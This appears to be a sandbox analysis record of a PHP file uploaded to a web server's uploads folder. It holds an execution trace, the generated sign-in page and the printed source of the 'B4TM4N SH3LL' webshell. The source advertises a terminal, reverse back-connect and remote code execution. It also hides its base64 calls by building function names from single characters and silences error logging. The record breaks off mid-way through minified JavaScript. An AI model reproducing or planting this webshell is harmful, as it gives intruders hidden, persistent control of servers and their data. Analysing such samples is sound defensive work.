1 A /var/www/html/uploads/bat.php 61 $k = 'HTTP_ACCEPT_ENCODING'
2 11 0 0.003778 1090792 strtolower 0 /var/www/html/uploads/bat.php 63 1 'HTTP_ACCEPT_ENCODING'
2 11 1 0.003791 1090872
2 11 R 'http_accept_encoding'
2 12 0 0.003805 1090840 define 0 /var/www/html/uploads/bat.php 63 2 'http_accept_encoding' 'gzip, deflate'
2 12 1 0.003820 1090944
2 12 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'HTTP_ACCEPT'
2 13 0 0.003842 1090872 strtolower 0 /var/www/html/uploads/bat.php 63 1 'HTTP_ACCEPT'
2 13 1 0.003855 1090944
2 13 R 'http_accept'
2 14 0 0.003869 1090912 define 0 /var/www/html/uploads/bat.php 63 2 'http_accept' '*/*'
2 14 1 0.003883 1091016
2 14 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'HTTP_CONNECTION'
2 15 0 0.003906 1090944 strtolower 0 /var/www/html/uploads/bat.php 63 1 'HTTP_CONNECTION'
2 15 1 0.003919 1091016
2 15 R 'http_connection'
2 16 0 0.003933 1090984 define 0 /var/www/html/uploads/bat.php 63 2 'http_connection' 'keep-alive'
2 16 1 0.003946 1091088
2 16 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'PATH'
2 17 0 0.003969 1091016 strtolower 0 /var/www/html/uploads/bat.php 63 1 'PATH'
2 17 1 0.003981 1091080
2 17 R 'path'
2 18 0 0.003994 1091048 define 0 /var/www/html/uploads/bat.php 63 2 'path' '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin'
2 18 1 0.004010 1091152
2 18 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'SERVER_SIGNATURE'
2 19 0 0.004033 1091080 strtolower 0 /var/www/html/uploads/bat.php 63 1 'SERVER_SIGNATURE'
2 19 1 0.004045 1091160
2 19 R 'server_signature'
2 20 0 0.004059 1091128 define 0 /var/www/html/uploads/bat.php 63 2 'server_signature' '<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n'
2 20 1 0.004077 1091232
2 20 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'SERVER_SOFTWARE'
2 21 0 0.004100 1091160 strtolower 0 /var/www/html/uploads/bat.php 63 1 'SERVER_SOFTWARE'
2 21 1 0.004113 1091232
2 21 R 'server_software'
2 22 0 0.004126 1091200 define 0 /var/www/html/uploads/bat.php 63 2 'server_software' 'Apache/2.4.52 (Ubuntu)'
2 22 1 0.004141 1091304
2 22 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'SERVER_NAME'
2 23 0 0.004170 1091232 strtolower 0 /var/www/html/uploads/bat.php 63 1 'SERVER_NAME'
2 23 1 0.004183 1091304
2 23 R 'server_name'
2 24 0 0.004197 1091272 define 0 /var/www/html/uploads/bat.php 63 2 'server_name' 'localhost'
2 24 1 0.004210 1091376
2 24 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'SERVER_ADDR'
2 25 0 0.004233 1091304 strtolower 0 /var/www/html/uploads/bat.php 63 1 'SERVER_ADDR'
2 25 1 0.004245 1091376
2 25 R 'server_addr'
2 26 0 0.004258 1091344 define 0 /var/www/html/uploads/bat.php 63 2 'server_addr' '127.0.0.1'
2 26 1 0.004272 1091448
2 26 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'SERVER_PORT'
2 27 0 0.004295 1091376 strtolower 0 /var/www/html/uploads/bat.php 63 1 'SERVER_PORT'
2 27 1 0.004308 1091448
2 27 R 'server_port'
2 28 0 0.004321 1091416 define 0 /var/www/html/uploads/bat.php 63 2 'server_port' '80'
2 28 1 0.004334 1091520
2 28 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'REMOTE_ADDR'
2 29 0 0.004356 1091448 strtolower 0 /var/www/html/uploads/bat.php 63 1 'REMOTE_ADDR'
2 29 1 0.004368 1091520
2 29 R 'remote_addr'
2 30 0 0.004382 1091488 define 0 /var/www/html/uploads/bat.php 63 2 'remote_addr' '127.0.0.1'
2 30 1 0.004396 1091592
2 30 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'DOCUMENT_ROOT'
2 31 0 0.004418 1091520 strtolower 0 /var/www/html/uploads/bat.php 63 1 'DOCUMENT_ROOT'
2 31 1 0.004431 1091592
2 31 R 'document_root'
2 32 0 0.004445 1091560 define 0 /var/www/html/uploads/bat.php 63 2 'document_root' '/var/www/html'
2 32 1 0.004458 1091664
2 32 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'REQUEST_SCHEME'
2 33 0 0.004480 1091592 strtolower 0 /var/www/html/uploads/bat.php 63 1 'REQUEST_SCHEME'
2 33 1 0.004494 1091664
2 33 R 'request_scheme'
2 34 0 0.004507 1091632 define 0 /var/www/html/uploads/bat.php 63 2 'request_scheme' 'http'
2 34 1 0.004521 1091736
2 34 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'CONTEXT_PREFIX'
2 35 0 0.004544 1091664 strtolower 0 /var/www/html/uploads/bat.php 63 1 'CONTEXT_PREFIX'
2 35 1 0.004557 1091736
2 35 R 'context_prefix'
2 36 0 0.004571 1091704 define 0 /var/www/html/uploads/bat.php 63 2 'context_prefix' ''
2 36 1 0.004584 1091808
2 36 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'CONTEXT_DOCUMENT_ROOT'
2 37 0 0.004608 1091736 strtolower 0 /var/www/html/uploads/bat.php 63 1 'CONTEXT_DOCUMENT_ROOT'
2 37 1 0.004620 1091816
2 37 R 'context_document_root'
2 38 0 0.004635 1091784 define 0 /var/www/html/uploads/bat.php 63 2 'context_document_root' '/var/www/html'
2 38 1 0.004649 1091888
2 38 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'SERVER_ADMIN'
2 39 0 0.004672 1091816 strtolower 0 /var/www/html/uploads/bat.php 63 1 'SERVER_ADMIN'
2 39 1 0.004684 1091888
2 39 R 'server_admin'
2 40 0 0.004697 1091856 define 0 /var/www/html/uploads/bat.php 63 2 'server_admin' 'webmaster@localhost'
2 40 1 0.004712 1091960
2 40 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'SCRIPT_FILENAME'
2 41 0 0.004735 1091888 strtolower 0 /var/www/html/uploads/bat.php 63 1 'SCRIPT_FILENAME'
2 41 1 0.004748 1091960
2 41 R 'script_filename'
2 42 0 0.004762 1091928 define 0 /var/www/html/uploads/bat.php 63 2 'script_filename' '/var/www/html/uploads/bat.php'
2 42 1 0.004776 1092032
2 42 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'REMOTE_PORT'
2 43 0 0.004798 1091960 strtolower 0 /var/www/html/uploads/bat.php 63 1 'REMOTE_PORT'
2 43 1 0.004811 1092032
2 43 R 'remote_port'
2 44 0 0.004824 1092000 define 0 /var/www/html/uploads/bat.php 63 2 'remote_port' '43628'
2 44 1 0.004837 1092104
2 44 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'GATEWAY_INTERFACE'
2 45 0 0.004860 1092032 strtolower 0 /var/www/html/uploads/bat.php 63 1 'GATEWAY_INTERFACE'
2 45 1 0.004877 1092112
2 45 R 'gateway_interface'
2 46 0 0.004891 1092080 define 0 /var/www/html/uploads/bat.php 63 2 'gateway_interface' 'CGI/1.1'
2 46 1 0.004906 1092184
2 46 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'SERVER_PROTOCOL'
2 47 0 0.004929 1092112 strtolower 0 /var/www/html/uploads/bat.php 63 1 'SERVER_PROTOCOL'
2 47 1 0.004942 1092184
2 47 R 'server_protocol'
2 48 0 0.004955 1092152 define 0 /var/www/html/uploads/bat.php 63 2 'server_protocol' 'HTTP/1.1'
2 48 1 0.004969 1092256
2 48 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'REQUEST_METHOD'
2 49 0 0.004992 1092184 strtolower 0 /var/www/html/uploads/bat.php 63 1 'REQUEST_METHOD'
2 49 1 0.005005 1092256
2 49 R 'request_method'
2 50 0 0.005019 1092224 define 0 /var/www/html/uploads/bat.php 63 2 'request_method' 'GET'
2 50 1 0.005033 1092328
2 50 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'QUERY_STRING'
2 51 0 0.005056 1092256 strtolower 0 /var/www/html/uploads/bat.php 63 1 'QUERY_STRING'
2 51 1 0.005068 1092328
2 51 R 'query_string'
2 52 0 0.005082 1092296 define 0 /var/www/html/uploads/bat.php 63 2 'query_string' ''
2 52 1 0.005095 1092400
2 52 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'REQUEST_URI'
2 53 0 0.005118 1092328 strtolower 0 /var/www/html/uploads/bat.php 63 1 'REQUEST_URI'
2 53 1 0.005131 1092400
2 53 R 'request_uri'
2 54 0 0.005145 1092368 define 0 /var/www/html/uploads/bat.php 63 2 'request_uri' '/uploads/bat.php'
2 54 1 0.005159 1092472
2 54 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'SCRIPT_NAME'
2 55 0 0.005181 1092400 strtolower 0 /var/www/html/uploads/bat.php 63 1 'SCRIPT_NAME'
2 55 1 0.005193 1092472
2 55 R 'script_name'
2 56 0 0.005207 1092440 define 0 /var/www/html/uploads/bat.php 63 2 'script_name' '/uploads/bat.php'
2 56 1 0.005221 1092544
2 56 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'PHP_SELF'
2 57 0 0.005243 1092472 strtolower 0 /var/www/html/uploads/bat.php 63 1 'PHP_SELF'
2 57 1 0.005255 1092544
2 57 R 'php_self'
2 58 0 0.005270 1092512 define 0 /var/www/html/uploads/bat.php 63 2 'php_self' '/uploads/bat.php'
2 58 1 0.005284 1092616
2 58 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'REQUEST_TIME_FLOAT'
2 59 0 0.005307 1092544 strtolower 0 /var/www/html/uploads/bat.php 63 1 'REQUEST_TIME_FLOAT'
2 59 1 0.005320 1092624
2 59 R 'request_time_float'
2 60 0 0.005334 1092592 define 0 /var/www/html/uploads/bat.php 63 2 'request_time_float' 1676262562.363
2 60 1 0.005349 1092696
2 60 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'REQUEST_TIME'
2 61 0 0.005372 1092624 strtolower 0 /var/www/html/uploads/bat.php 63 1 'REQUEST_TIME'
2 61 1 0.005384 1092696
2 61 R 'request_time'
2 62 0 0.005398 1092664 define 0 /var/www/html/uploads/bat.php 63 2 'request_time' 1676262562
2 62 1 0.005413 1092768
2 62 R TRUE
2 63 0 0.005428 1092696 any 1 /var/www/html/uploads/bat.php 148 2 'action' []
3 64 0 0.005442 1092696 array_key_exists 0 /var/www/html/uploads/bat.php 46 2 'action' []
3 64 1 0.005458 1092760
3 64 R FALSE
2 63 1 0.005472 1092696
2 63 R FALSE
2 65 0 0.005486 1092696 date 0 /var/www/html/uploads/bat.php 215 1 'Y'
2 65 1 0.005562 1095048
2 65 R '2023'
1 3 1 0.005592 1094760
0.005700 476728
TRACE END [2023-02-13 02:29:48.267035]
Generated HTML code
<html lang="en"><head>
<meta charset="utf-8">
<meta name="robots" content="noindex">
<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
<title>Signin</title>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<style type="text/css">
html,body{
height:100%;
}
body{
display:-ms-flexbox;
display:-webkit-box;
display:flex;
-ms-flex-align:center;
-ms-flex-pack:center;
-webkit-box-align:center;
align-items:center;
-webkit-box-pack:center;
justify-content:center;
padding-top:40px;
padding-bottom:40px;
background-color:#f5f5f5;
}
.form-signin{
width:100%;
max-width:330px;
padding:15px;
margin:0 auto;
}
.form-signin.checkbox{
font-weight:400;
}
.form-signin.form-control{
position:relative;
box-sizing:border-box;
height:auto;
padding:10px;
font-size:16px;
}
.form-signin.form-control:focus{
z-index:2;
}
.form-signin input[type="email"]{
margin-bottom:-1px;
border-bottom-right-radius:0;
border-bottom-left-radius:0;
}
.form-signin input[type="password"]{
margin-bottom:10px;
border-top-left-radius:0;
border-top-right-radius:0;
}
</style>
</head>
<body class="text-center">
<form class="form-signin" method="post">
<h1 class="h3 mb-3 font-weight-normal">Please sign in</h1>
<label for="username" class="sr-only">Email address</label>
<input type="text" name="username" id="username" class="form-control" placeholder="Username" autocomplete="off" required="" autofocus="">
<label for="password" class="sr-only">Password</label>
<input type="password" name="password" id="password" class="form-control" placeholder="Password" autocomplete="off" required="">
<button class="btn btn-lg btn-primary btn-block" type="submit" name="signin" value="signin">Sign In</button>
<p class="mt-5 mb-3 text-muted">©2023</p>
</form>
</body></html>Original PHP code
<?php
/*
* B4TM4N SH3LL is PHP WEBSHELL
*
* Features:
* [0] File Manager
* [1] Sec. Info
* [2] Simply Database
* [3] Interactive terminal
* [4] PHP Reverse Back Connect
* [5] Run PHP Code
* [6] Custom Toolz
* [7] Self Script Encryptor !
* [8] Error Handler
* [9] Themes
*
* Account:
* [Username] B64E('user')
* [Password] sha1(md5('pass'))
*/
$x_="zaIgxSRawZ==:42b378d7eb719b4ad9c908601bdf290d541c9c3a";
/*
* Self Script Encryptor v1.0
* ------- by k4mpr3t -------
*
* [Usage] http://website.com/shell.php?x=self-encryptor&name=shell_encrypt.php
*
*/
$config=array(
"title" => "B4TM4N SH3LL", // Your Title
"subtitle" => "V3RS10N 2.7 ~ k4mpr3t", // Your Subtitle
"themes" => "br34k", // Your Themes (D4RK or BR34K)
"debug" => false // Debug Mode
);
$account=explode(':',$x_);
session_start(); // Session Start
function any($x,$y)
{
return array_key_exists($x,$y);
}
function urle($x)
{
return B64E(urlencode($x));
}
function urld($x)
{
return urldecode(B64D(urldecode($x)));
}
define('_',DIRECTORY_SEPARATOR);
foreach($_SERVER as $k => $v)
{
define(strtolower($k),$_SERVER[$k]);
}
function B64E($x)
{
$d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$c="ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/";
$_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4";
$_g="_";$_h="e";$_i="n";$_j="c";$_k="o";$_l="d";$_m="e";
$b64=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m;
return strtr($b64($x),$d,$c);
}
function B64D($x)
{
$d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$c="ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/";
$_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4";
$_g="_";$_h="d";$_i="e";$_j="c";$_k="o";$_l="d";$_m="e";
$b64=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m;
return $b64(strtr($x,$d,$c));
}
function error ($errno, $errstr, $errfile, $errline)
{
switch ($errno)
{
case E_PARSE:
case E_STRICT:$errmsg='# DEBUG';break;
case E_NOTICE:
case E_USER_NOTICE:$errmsg='# NOTICE';break;
case E_USER_ERROR:
case E_RECOVERABLE_ERROR:$errmsg='# ERROR';break;
case E_WARNING:
case E_CORE_WARNING:
case E_COMPILE_WARNING:
case E_USER_WARNING:$errmsg='# WARNING';break;
case E_ERROR:
case E_CORE_ERROR:
case E_COMPILE_ERROR:$errmsg='# FATAL ERROR';break;
default:$errmsg='# UNKNOWN ERROR';break;
}
echo '<div class="error">';
echo $errmsg;
echo "<br>";
echo $errstr;
echo "<br>";
echo $errfile . ' (Line: ' . $errline . ')';
echo "<br>";
echo "<br>";
echo "</div>";
}
// Login Request
if(request_method=="POST")
{
if(any("username",$_REQUEST)&&any("password",$_REQUEST)&&any("signin",$_REQUEST))
{
if((B64E($_REQUEST['username'])==$account[0])&&(sha1(md5($_REQUEST['password']))==$account[1]))
{
session_regenerate_id();
$_SESSION['action']=array(
"username" => B64E($_REQUEST['username']),
"password" => sha1(md5($_REQUEST['password']))
);
}
else
{
// THIS IS FUCKING LOCAL DAMN LOG N00B! (https://github.com/k4mpr3t/b4tm4n/issues/5)
$log=array(
"Username: ".$_REQUEST['username'],
"Password: ".$_REQUEST['password'],
"Remote IP: ".remote_addr,
"Time: ".date('Y-m-d H:i:s'),
"-------------------------\r\n",
);
$file=dirname(__FILE__)._.'.log';
$write_log=implode($log,"\r\n");
$op=fopen($file,'a+');
fwrite($op,$write_log);
fclose($op);
}
}
}
if(!any("action",$_SESSION))
{
?><!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex"/>
<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
<title>Signin</title>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<style type='text/css'>
html,body{
height:100%;
}
body{
display:-ms-flexbox;
display:-webkit-box;
display:flex;
-ms-flex-align:center;
-ms-flex-pack:center;
-webkit-box-align:center;
align-items:center;
-webkit-box-pack:center;
justify-content:center;
padding-top:40px;
padding-bottom:40px;
background-color:#f5f5f5;
}
.form-signin{
width:100%;
max-width:330px;
padding:15px;
margin:0 auto;
}
.form-signin.checkbox{
font-weight:400;
}
.form-signin.form-control{
position:relative;
box-sizing:border-box;
height:auto;
padding:10px;
font-size:16px;
}
.form-signin.form-control:focus{
z-index:2;
}
.form-signin input[type="email"]{
margin-bottom:-1px;
border-bottom-right-radius:0;
border-bottom-left-radius:0;
}
.form-signin input[type="password"]{
margin-bottom:10px;
border-top-left-radius:0;
border-top-right-radius:0;
}
</style>
</head>
<body class="text-center">
<form class="form-signin" method='post'>
<h1 class="h3 mb-3 font-weight-normal">Please sign in</h1>
<label for="username" class="sr-only">Email address</label>
<input type="text" name="username" id="username" class="form-control" placeholder="Username" autocomplete="off" required autofocus>
<label for="password" class="sr-only">Password</label>
<input type="password" name="password" id="password" class="form-control" placeholder="Password" autocomplete="off" required>
<button class="btn btn-lg btn-primary btn-block" type="submit" name="signin" value="signin">Sign In</button>
<p class="mt-5 mb-3 text-muted">©<?=date('Y')?></p>
</form>
</body>
</html><?php
}
else
{
ob_start(); // Prevent Double Html $_REQUEST
if(!strpos(strval(ini_get('disable_functions')),'set_time_limit'))
{
set_time_limit(0);
}
// Debug Settings
if($config['debug']==true)
{
set_error_handler('error'); // Error Handler
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
}
else
{
error_reporting(0);
ini_set('error_log',null);
ini_set('html_errors',0);
ini_set('log_errors',0);
ini_set('log_errors_max_len',0);
ini_set('display_errors',0);
ini_set('display_startup_errors',0);
}
ini_set('max_execution_time','600');
ini_set('memory_limit','256M');
$agent=B64D("FT06ACQoAXYrvHYXMUIMMV5e"); // Powered by B4TM4N
$title=$config['title']; // Title Page
$start=microtime(true); // Time Pageload
?><!DOCTYPE html>
<html>
<head>
<title>
<?=$title?>
</title>
<meta name='author' content='k4mpr3t'/>
<link href="data:image/png;base64,AAABAAEAEBACAAAAAACwAAAAFgAAACgAAAAQAAAAIAAAAAEAAQAAAAAAQAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//wAA//8AAP//AAD//wAA//8AAP7/AAD8fwAAwAcAAMAHAACMYwAADWEAAP//AAD//wAA//8AAP//AAD//wAA" rel="icon" type="image/x-icon" />
<style type="text/css">
<?php if(strtolower($config['themes']) == 'd4rk'): ?>
:root {
--background-color:#000;
--color:#00ff00;
--txt-color: #fff;
--txt-hover-color: #fff;
--border-color: #222;
--border-hover-color: #333;
--table-odd-color : #000;
--table-even-color : #111;
--table-hover-color : #222;
--button-color : #111;
--button-hover-color : #222;
}
<?php endif; ?>
<?php if(strtolower($config['themes']) == 'br34k'): ?>
:root {
--background-color:#fff;
--color:#000;
--txt-color: #000;
--txt-hover-color: #666;
--border-color: #111;
--border-hover-color: #222;
--table-odd-color : #eee;
--table-even-color : #ddd;
--table-hover-color : #ccc;
--button-color : #ccc;
--button-hover-color : #bbb;
}
<?php endif; ?>
@keyframes blinker{70%{opacity:0}}
*,html{margin:0;padding:0;line-height:1rem}
body{background:var(--background-color);color:var(--color);font-family:monospace;font-size:13px}
::-moz-selection{background:var(--color);color:var(--background-color)}
::selection{background:var(--color);color:var(--background-color)}
img{vertical-align:bottom}
hr{border:1px solid var(--border-color);margin:3px 0px 0px}
a{color:var(--color);text-decoration:none}
a:hover{color:var(--txt-hover-color)}
a.active{color:var(--txt-color)}
a.action{font-size:12px;padding:5px;margin:0px;background:var(--button-color);color:var(--txt-color);border:1px solid #222;cursor:pointer;outline:none;display:inline-block}
a.action:hover{background:var(--button-hover-color);border:1px solid var(--border-hover-color)}
label{display:inline-block;min-width:75px;padding-right:15px}
iframe{background:var(--txt-hover-color)}
fieldset {border:1px solid var(--border-color);background:var(--background-color);color:var(--color);width:100%;padding:15px;box-sizing:border-box;min-height:154px}
textarea {border:1px solid var(--border-color);background:var(--background-color);color:var(--color);width:100%;padding:15px;min-height:300px;outline:none;box-sizing:border-box;resize:none}
input[type=submit]{background:var(--button-color);border:1px solid var(--border-color);color:var(--txt-color);line-height:25px;padding:0 10px;cursor:pointer;outline:none}
input[type=submit]:hover{background:var(--button-hover-color);border:1px solid var(--border-hover-color)}
input[type=text]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}
input[type=number]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}
input[type=file]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:2px;outline:none;box-sizing:border-box}
select{background:var(--background-color);color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}
#wrapper{width:93%;margin:37px auto 40px}
#info{margin:0 0 23px 0;padding:0 13px 0 0}
#header{display:inline-block;width:100%}
.header-left{float:left;width:66%}
.header-right{float:right;width:34%}
#connect{display:inline-block;width:100%}
.connect-left{float:left;width:49%}
.connect-right{float:right;width:49%}
#database-session{display:inline-block;width:100%}
.database-query{float:left;width:49%}
.database-process{float:right;width:49%}
#php{display:inline-block}
.php-left{float:left;width:49%}
.php-right{float:right;width:49%}
.divide{width:100%;display:inline-block}
.divide-left{float:left;width:50%}
.divide-right{float:right;width:50%}
.mail input[type=text]{width:100%;display:block}
.database-breadcrumb{margin:10px 0 0;display:inline-block;font-style: italic;}
#update{text-align:center}
#php-configuration{text-align:center}
.error{animation:blinker 1s linear infinite;background:var(--color);color:var(--background-color);padding:10px;margin:10px;}
#logo{margin:0 0 23px 0;padding:23px 0 23px 0;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color)}
.content{border:1px solid var(--border-color);padding:10px;overflow:auto;overflow-y:hidden}
#process-list{padding:25px;margin:25px auto 0px;border:1px solid var(--border-color);overflow:scroll;overflow-y:hidden}
#process-list s{text-decoration:none}
.tools-header{margin-bottom:20px;padding-bottom:25px;text-align:center;border-bottom:1px solid var(--border-color)}
.menu{overflow:hidden;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color);margin:10px 0}
.menu > ul{list-style:none;margin:0;padding:0}
.menu > ul > li{margin:0 3px 0 0;padding:10px 7px 10px 7px;display:block;float:left}
.menu > ul > li:hover{cursor:pointer}
.menu-tools{overflow:hidden;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color);margin:10px 0}
.menu-tools > ul{list-style:none;margin:0;padding:0}
.menu-tools > ul > li{margin:0 3px 0 0;padding:10px 7px 10px 7px;display:block;float:left}
.menu-tools > ul > li:hover{cursor:pointer}
.menu-directory{;margin-bottom:10px}
.new{margin-right:15px;}
.hash label{min-width:40px;display:inline-block;padding-right:15px}
.hash-capture label{margin:10px 0;display:inline-block}
.hash input[type=radio]{margin-right:10px;display:inline-block;vertical-align:middle}
.auto-number table{counter-reset:row_}
.auto-number table tbody tr td:first-child{counter-increment:row_;vertical-align:middle;text-align:center}
.auto-number table tbody tr td:first-child::before{content:counter(row_)}
#title{text-align:center;font-size:44px;margin:0;color:var(--txt-color);margin-bottom:15px}
#subtitle{text-align:center;font-size:22px;margin:0;color:var(--txt-color);margin-top:8px}
#tools{min-height:125px;padding:10px;border-radius:5px}
#account{min-height:100px;padding:10px;border-radius:5px}
#thanks{text-align:center;font-size:16px;font-family:courier;padding:5% 0}
#footer{margin:25px auto}
#copyrights{text-align:center}
#pageload{text-align:center}
#query{margin-top:10px}
#database-query{overflow:auto;margin:10px 0}
#hexdump{height:300px;overflow:auto;overflow-x:hidden}
#terminal{min-height:100px;padding:10px;border-radius:5px}
#terminal-input{border:none}
#curdir-terminal{min-width:10px}
#database{min-height:100px;padding:10px;border-radius:5px}
#database label{width:100px;padding:5px;margin-right:10px;display:inline-block}
#port-scan label{width:100px;padding:5px;margin-right:10px;display:inline-block}
#phpinfo table{margin:25px 0}
#phpinfo tr:nth-child(odd){background:var(--background-color)}
#phpinfo tr:nth-child(even){background:var(--border-color)}
#phpinfo td,th{padding:5px;border:1px solid var(--border-color)}
#phpinfo h1{margin:10px 0}
#phpinfo h2{margin:10px 0}
#phpinfo.e{width:200px}
#phpinfo.v{word-break:break-word}
#phpinfo img{display:none}
#phpinfo hr{border:none}
.line h2{position:relative;top:12px;width:100px;display:inline;background:var(--background-color);padding:0 10px;color:var(--txt-color)}
.line{border-bottom:2px solid var(--color);text-align:center;width:287px;margin:auto}
.table {width:100%;margin:10px 0}
.table td,th{padding:5px;border:1px solid var(--border-color);max-width:250px;min-width:25px}
.table td.kanan{word-break:break-word}
.table td.kiri{width:30%}
.table tr:nth-child(odd){background:var(--table-odd-color)}
.table tr:nth-child(even){background:var(--table-even-color)}
.table tr:hover td{background:var(--table-hover-color)}
.table tfoot td{padding:10px;text-align:center}
.database-table > td.table {word-break:normal;}
.map-switch{display:inline-block}
.form-fix{margin:-15px 0}
.frmsource{margin-top:10px}
.hexdump{width:100%;padding:5px;margin-bottom:5px}
.hexdump td{text-align:left}
.highlight{background:var(--background-color);word-break:break-word;padding:15px;margin-bottom:5px;height:300px;overflow:auto}
.hash-capture{display:inline-block;width:100%}
.hash-capture-left{float:left;width:49%}
.hash-capture-right{float:right;width:49%}
.clr{clear:both}
.on{color:var(--txt-color)}
.off{color:red}
.result{padding:10px}
.sortable thead{cursor:pointer}
.disablefunc{overflow-wrap:break-word}
.loading{vertical-align:middle;width:16px;height:16px;display:inline-block;background:url('data:image/gif;base64,R0lGODlhEAAQAPIAAAAAAP///zw8PLy8vP///5ycnHx8fGxsbCH+GkNyZWF0ZWQgd2l0aCBhamF4bG9hZC5pbmZvACH5BAAKAAAAIf8LTkVUU0NBUEUyLjADAQAAACwAAAAAEAAQAAADMwi63P4wyklrE2MIOggZnAdOmGYJRbExwroUmcG2LmDEwnHQLVsYOd2mBzkYDAdKa+dIAAAh+QQACgABACwAAAAAEAAQAAADNAi63P5OjCEgG4QMu7DmikRxQlFUYDEZIGBMRVsaqHwctXXf7WEYB4Ag1xjihkMZsiUkKhIAIfkEAAoAAgAsAAAAABAAEAAAAzYIujIjK8pByJDMlFYvBoVjHA70GU7xSUJhmKtwHPAKzLO9HMaoKwJZ7Rf8AYPDDzKpZBqfvwQAIfkEAAoAAwAsAAAAABAAEAAAAzMIumIlK8oyhpHsnFZfhYumCYUhDAQxRIdhHBGqRoKw0R8DYlJd8z0fMDgsGo/IpHI5TAAAIfkEAAoABAAsAAAAABAAEAAAAzIIunInK0rnZBTwGPNMgQwmdsNgXGJUlIWEuR5oWUIpz8pAEAMe6TwfwyYsGo/IpFKSAAAh+QQACgAFACwAAAAAEAAQAAADMwi6IMKQORfjdOe82p4wGccc4CEuQradylesojEMBgsUc2G7sDX3lQGBMLAJibufbSlKAAAh+QQACgAGACwAAAAAEAAQAAADMgi63P7wCRHZnFVdmgHu2nFwlWCI3WGc3TSWhUFGxTAUkGCbtgENBMJAEJsxgMLWzpEAACH5BAAKAAcALAAAAAAQABAAAAMyCLrc/jDKSatlQtScKdceCAjDII7HcQ4EMTCpyrCuUBjCYRgHVtqlAiB1YhiCnlsRkAAAOwAAAAAAAAAAAA==')}
</style>
<script type="text/javascript">
function dean_addEvent(t,e,r){if(t.addEventListener)t.addEventListener(e,r,!1);else{r.$$guid||(r.$$guid=dean_addEvent.guid++),t.events||(t.events={});var o=t.events[e];o||(o=t.events[e]={},t["on"+e]&&(o[0]=t["on"+e])),o[r.$$guid]=r,t["on"+e]=handleEvent}}function removeEvent(t,e,r){t.removeEventListener?t.removeEventListener(e,r,!1):t.events&&t.events[e]&&delete t.events[e][r.$$guid]}function handleEvent(t){var e=!0;t=t||fixEvent(((this.ownerDocument||this.document||this).parentWindow||window).event);var r=this.events[t.type];for(var o in r)this.$$handleEvent=r[o],!1===this.$$handleEvent(t)&&(e=!1);return e}function fixEvent(t){return t.preventDefault=fixEvent.preventDefault,t.stopPropagation=fixEvent.stopPropagation,t}var 